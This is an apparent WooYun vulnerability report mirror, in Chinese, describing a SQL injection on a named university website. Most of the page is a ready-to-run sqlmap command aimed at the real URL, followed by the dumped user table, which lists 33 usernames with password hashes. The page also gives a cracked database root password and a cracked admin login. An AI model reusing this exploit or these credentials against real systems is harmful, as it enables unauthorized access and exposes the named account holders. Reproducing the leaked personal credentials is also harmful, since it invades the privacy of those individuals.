乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-11: 细节已通知厂商并且等待厂商处理中 2016-01-16: 厂商已经主动忽略漏洞,细节向公众公开
RT
注入点 http://life.cqu.edu.cn//chinese/search/index.php?search=1
--is-dba
--passwords
root的hash破解后为tiantianxiangshang
sqlmap -u "http://life.cqu.edu.cn//chinese/search/index.php?search=1" -D home_page -T hp_user -C "user,passwd" --dump
Database: home_pageTable: hp_user[33 entries]+---------------+----------------------------------+| user | passwd |+---------------+----------------------------------+| admin | 01547a0513cc4cbf516f9bbf035ede85 || baiqiang | f379eaf3c831b04de153469d1bec345e || caoyueqing | f379eaf3c831b04de153469d1bec345e || dengwei | f379eaf3c831b04de153469d1bec345e || dongpan | 7567a2d425ade50cdeec832c2cc9f2fc || gaodinglun | 98c81cb2f3b09fd982f3ff4181221276 || gaoyanqiang | b33dfa2d15955ac6e806ce266fe74154 || heyu | f379eaf3c831b04de153469d1bec345e || huangxiaobin | f379eaf3c831b04de153469d1bec345e || huorunlan | 2f8b9e14ccdfde77d206fac5d74433f4 || jinkai | f379eaf3c831b04de153469d1bec345e || linzhenghong | f379eaf3c831b04de153469d1bec345e || liutingting | f379eaf3c831b04de153469d1bec345e || lizhengguo | f379eaf3c831b04de153469d1bec345e || mb | f379eaf3c831b04de153469d1bec345e || pangshanshan | db0c8e9d90e9596914fca79bdc51a68f || pengguoxiong | f379eaf3c831b04de153469d1bec345e || qiurongfu | 569cc496d9ee66472c4d31259e3ce51b || renmaozhi | f379eaf3c831b04de153469d1bec345e || shilei | f379eaf3c831b04de153469d1bec345e || shuhui | b53881c8791ba259ce354d79775391e4 || sunwei | fc9dd7ca7781c9c172c4b5975a2b4587 || tengyong | fd820a2b4461bddd116c1518bc4b0f77 || wangyongchuan | a26b3ae2c6cf46b62b0ad25c1bf6482a || wangzhongkang | f379eaf3c831b04de153469d1bec345e || xiayuxian | f379eaf3c831b04de153469d1bec345e || yangyingwu | f379eaf3c831b04de153469d1bec345e || yinyouping | f379eaf3c831b04de153469d1bec345e || yulihua | f379eaf3c831b04de153469d1bec345e || yuquanyou | 432fe86391b6b7c012a322f526e48fc1 || zengdeyu | f379eaf3c831b04de153469d1bec345e || zhangze | 0683bd490a71caf7d0bc9a4fa83766ff || zhuzhenglin | f379eaf3c831b04de153469d1bec345e |+---------------+----------------------------------+
随便破解一个 admin/alahunan123456
过滤。
危害等级:无影响厂商忽略
忽略时间:2016-01-16 11:58
漏洞Rank:4 (WooYun评价)
暂无